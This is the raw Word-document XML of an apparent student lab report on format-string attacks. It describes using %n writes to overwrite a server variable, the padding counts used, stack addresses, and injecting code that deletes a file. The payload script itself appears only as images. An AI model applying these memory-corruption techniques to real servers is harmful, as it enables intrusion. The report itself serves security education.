            <wp:effectExtent l="0" t="0" r="5080" b="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000" cy="8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547C" w14:textId="0A076C5D" w:rsidR="00A37D13" w:rsidRPr="00A37D13" w:rsidRDefault="00A37D13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poking and prodding to find the </w:t>
      </w:r>
      <w:r w:rsidR="00E72272">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">correct combination to get the message, I found that it was the similar to the previous part in that we needed 72 format specifiers, with the last one being %s. (I could not get the program or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E72272"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 w:rsidR="00E72272">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to work correctly, so this was a bit painful)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF7483" w14:textId="59D4E3D5" w:rsidR="00A37D13" w:rsidRDefault="00A37D13" w:rsidP="00996C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3706DE" wp14:editId="674EEFBD">
            <wp:extent cx="5551502" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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435" cy="13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371F" w14:textId="62241236" w:rsidR="00E72272" w:rsidRDefault="00E72272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can see we did indeed get the secret message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDB8F17" w14:textId="2E0D274B" w:rsidR="00E72272" w:rsidRDefault="00E72272" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A93C17" w14:textId="7C732202" w:rsidR="00E72272" w:rsidRDefault="00E72272" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EC96E4" w14:textId="7A65A5E1" w:rsidR="00E72272" w:rsidRDefault="00E72272" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2899AF03" w14:textId="5D138173" w:rsidR="00E72272" w:rsidRDefault="00E72272" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72272">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.5 Task 5: Change the Server Program’s Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A068C" w14:textId="4E6AEA54" w:rsidR="00EA3629" w:rsidRPr="006724AA" w:rsidRDefault="006724AA" w:rsidP="00996C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24AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5.A: Change the value to a different </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006724AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B29E4F1" w14:textId="4727A801" w:rsidR="00EA322F" w:rsidRDefault="003B649D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32A09" wp14:editId="4D21DEC6">
            <wp:extent cx="5166808" cy="739204"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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05CE" w14:textId="00D85AD4" w:rsidR="00B177D4" w:rsidRDefault="00B177D4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0FE21" wp14:editId="1A86E6A9">
            <wp:extent cx="5213139" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="698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087" cy="71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82F3" w14:textId="2176D75A" w:rsidR="00AB285F" w:rsidRDefault="00441E07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ing the </w:t>
      </w:r>
      <w:r w:rsidR="00E544A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>address to the target’s</w:t>
      </w:r>
      <w:r w:rsidR="003947E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and using the same method </w:t>
      </w:r>
      <w:r w:rsidR="00B057DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as above and putting %n instead of %s we can swap the </w:t>
      </w:r>
      <w:r w:rsidR="0081178F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">target value to a different one, however we have little control over what this value </w:t>
      </w:r>
      <w:r w:rsidR="00EA3629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>will b</w:t>
      </w:r>
      <w:r w:rsidR="006724AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e, which we will attempt to tackle in the next part.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DF8A5" w14:textId="74C32283" w:rsidR="00873662" w:rsidRDefault="00AB285F" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB285F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5.B: Change the value to 0x500</w:t>
      </w:r>
      <w:r w:rsidR="00C06380">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7414AA" w14:textId="7B34943D" w:rsidR="00AB285F" w:rsidRDefault="00AB285F" w:rsidP="00996C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B27E990" wp14:editId="392D64FA">
            <wp:extent cx="5159187" cy="937341"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"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76DA" w14:textId="47CCF82D" w:rsidR="00AB285F" w:rsidRDefault="00AB285F" w:rsidP="00996C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50F51B" wp14:editId="42CC18A4">
            <wp:extent cx="4541914" cy="205758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B6C8" w14:textId="7ACE4F67" w:rsidR="00A648E9" w:rsidRDefault="00A648E9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a bit of trial and error,</w:t>
      </w:r>
      <w:r w:rsidR="007C2E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we finally hit the magic number of 1113, this is of course added to the 71 other</w:t>
      </w:r>
      <w:r w:rsidR="002E12F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E12F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E12F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to give </w:t>
      </w:r>
      <w:r w:rsidR="000A597D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1184.</w:t>
      </w:r>
      <w:r w:rsidR="00BC17FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BC17FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>I’m</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BC17FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> not quite sure why this exactly works</w:t>
      </w:r>
      <w:r w:rsidR="005E23C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, other than placing the value in the correct spot and counting up</w:t>
      </w:r>
      <w:r w:rsidR="00280202">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">wards after regarding all the other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00280202">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00280202">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C90F36" w14:textId="305E12CD" w:rsidR="00C06380" w:rsidRDefault="00C06380" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5.C: Change the value to 0xFF990000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404133F" w14:textId="64EEA000" w:rsidR="00D96801" w:rsidRDefault="00D96801" w:rsidP="00996C9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7D018F" wp14:editId="6F5517AB">
            <wp:extent cx="6575349" cy="647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899" cy="6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991C" w14:textId="2E79E598" w:rsidR="00C06380" w:rsidRDefault="00D96801" w:rsidP="00996C9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24FB19" wp14:editId="3126963B">
            <wp:extent cx="4580017" cy="1905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E92" w14:textId="08FD3955" w:rsidR="00757869" w:rsidRDefault="00D96801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a bit of trial and error I arrived at </w:t>
      </w:r>
      <w:r w:rsidR="00BE64FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">65258 padding for the first half of the value, and 101 for the second half, it should be noted that </w:t>
      </w:r>
      <w:r w:rsidR="00AD2D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">for the portion with 101, if it is changed to 100, the back half of the output will be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A3A63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. The reason for this is that </w:t>
      </w:r>
      <w:r w:rsidR="00603C5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="007A3A63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> get zero</w:t>
      </w:r>
      <w:r w:rsidR="00A20E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A20E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A20E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> overflow our number (otherwise getting zero would be impossible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E764F" w14:textId="112D77EA" w:rsidR="00757869" w:rsidRDefault="00757869" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185DFCDD" w14:textId="758D2F2B" w:rsidR="00757869" w:rsidRDefault="00757869" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445774CA" w14:textId="77777777" w:rsidR="00603C5E" w:rsidRDefault="00603C5E" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB9A3FE" w14:textId="700C3818" w:rsidR="00A20E81" w:rsidRDefault="00E4556D" w:rsidP="00996C91">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:r>
        <w:t>Task 6: Inject Malicious Code into the Server Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F862A" w14:textId="7EFED8D2" w:rsidR="00165145" w:rsidRDefault="004A2617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ddresses change from here on out, as this Task was done over several days</w:t>
      </w:r>
      <w:r w:rsidR="001F3909">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00112D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and had to be debugged and redone, due to an error with transferring my specific exploit.py to have spaces where they should not be, causing a crash. But it works now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF1B80" w14:textId="39F5F9F8" w:rsidR="00A40264" w:rsidRDefault="00A40264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553191" wp14:editId="513D5BC2">
            <wp:extent cx="5943600" cy="990600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D3DA" w14:textId="3003090D" w:rsidR="00112D07" w:rsidRDefault="00A40264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running </w:t>
      </w:r>
      <w:r w:rsidR="00E95961">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the program, here is what /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E95961">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E95961">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> looks lik</w:t>
      </w:r>
      <w:r w:rsidR="009403CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA949D" w14:textId="7181E5C1" w:rsidR="0045540B" w:rsidRDefault="0097333F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d</w:t>
      </w:r>
      <w:r w:rsidR="008B6BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687A6D0" w14:textId="47CB4795" w:rsidR="008B6BA0" w:rsidRDefault="008B6BA0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480DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E76BA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>format string</w:t>
      </w:r>
      <w:r w:rsidR="002D5D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006206E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0xbfffe</w:t>
      </w:r>
      <w:r w:rsidR="006206E1" w:rsidRPr="006206E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="006206E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>b0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B8ABE" w14:textId="2A1780CD" w:rsidR="008B6BA0" w:rsidRDefault="008B6BA0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044455">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> return address: </w:t>
      </w:r>
      <w:r w:rsidR="003617AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00480DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>bfffe6</w:t>
      </w:r>
      <w:r w:rsidR="0097333F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00480DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26060FDE" w14:textId="6A14728C" w:rsidR="006E46BB" w:rsidRDefault="008B6BA0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3617AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D5D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">input array: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk67692830"/>
      <w:r w:rsidR="003617AF" w:rsidRPr="003617AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0xbfffe6d0</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2D7B45F8" w14:textId="77777777" w:rsidR="00391495" w:rsidRDefault="00391495" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C691D8" w14:textId="1E1BA218" w:rsidR="0097333F" w:rsidRDefault="0097333F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 Image disappeared, but here is where we would run the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0031EEDE" w14:textId="52EB7C97" w:rsidR="0097333F" w:rsidRDefault="0097333F" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FCDA54" w14:textId="13C4E3D7" w:rsidR="0097333F" w:rsidRDefault="00391495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655EB0" wp14:editId="62EE4686">
            <wp:extent cx="4655820" cy="1095010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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854" cy="11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B30D" w14:textId="57DD6451" w:rsidR="002F2B61" w:rsidRDefault="002F2B61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is the construction of our input to the server, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the contents generated from </w:t>
      </w:r>
      <w:r w:rsidR="00D075B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>exploit.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E6C03" w14:textId="60856DD3" w:rsidR="0097333F" w:rsidRDefault="0097333F" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD7B9E6" w14:textId="46E582DC" w:rsidR="0097333F" w:rsidRDefault="0097333F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F8974B" wp14:editId="37F4D6E9">
            <wp:extent cx="4533900" cy="1591937"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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524" cy="15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0012" w14:textId="0FBBDE76" w:rsidR="0097333F" w:rsidRDefault="0097333F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important portion used in the above input, it is also what primarily caused my program to crash in the previous report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA3F4E" w14:textId="433FA031" w:rsidR="0097333F" w:rsidRDefault="0097333F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4EA188" wp14:editId="3B97A271">
            <wp:extent cx="4572396" cy="1531753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8ABA" w14:textId="1F371913" w:rsidR="00911DA3" w:rsidRDefault="0097333F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s of running are promising, but did we delete the file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B5E1EF" w14:textId="1FC9B9E2" w:rsidR="00097C49" w:rsidRDefault="00534E7F" w:rsidP="00996C9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9EBF69" wp14:editId="6DAE9AC6">
            <wp:extent cx="5212080" cy="1507383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37666" cy="151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CDA0" w14:textId="18FA1198" w:rsidR="0097333F" w:rsidRDefault="0097333F" w:rsidP="00996C9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t would seem that we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> did indeed, success!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED36C1" w14:textId="1EE1DB46" w:rsidR="00CD2C28" w:rsidRDefault="005E1B73" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1B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8095153" wp14:editId="4E6AB42F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>114300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>239395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="792480" cy="4648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2B853" w14:textId="756A28A4" w:rsidR="005E1B73" w:rsidRDefault="003178D7">
                            <w:r>
                              <w:t>Malicious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95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18.85pt;width:62.4pt;height:36.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" strokecolor="red">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0D62B853" w14:textId="756A28A4" w:rsidR="005E1B73" w:rsidRDefault="003178D7">
                      <w:r>
                        <w:t>Malicious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62178" wp14:editId="115B6681">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>411480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>711835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="861060" cy="53340"/>
                <wp:effectExtent l="0" t="19050" r="72390" b="990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53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FE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2.4pt;margin-top:56.05pt;width:67.8pt;height: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9C3ECA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38040FBB" wp14:editId="50AB0886">
            <wp:extent cx="4572635" cy="30175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D004C" w14:textId="392FD33A" w:rsidR="009C3ECA" w:rsidRDefault="009C3ECA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tual location of the malicious code is: </w:t>
      </w:r>
      <w:r w:rsidRPr="003617AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0xbfffe6d0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:r w:rsidR="006A4E4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A4E4D" w:rsidRPr="006A4E4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1248</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E5E21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>= 0xbfffe</w:t>
      </w:r>
      <w:r w:rsidR="0097333F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>bb0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068689F3" w14:textId="2AD24BBA" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1E2BBD" w14:textId="5F493469" w:rsidR="00806826" w:rsidRDefault="006A4E4D" w:rsidP="00996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03D7E0" wp14:editId="56BB0204">
            <wp:extent cx="2607652" cy="42672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208" cy="427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428E0" w14:textId="0D10CE94" w:rsidR="00806826" w:rsidRDefault="00806826" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
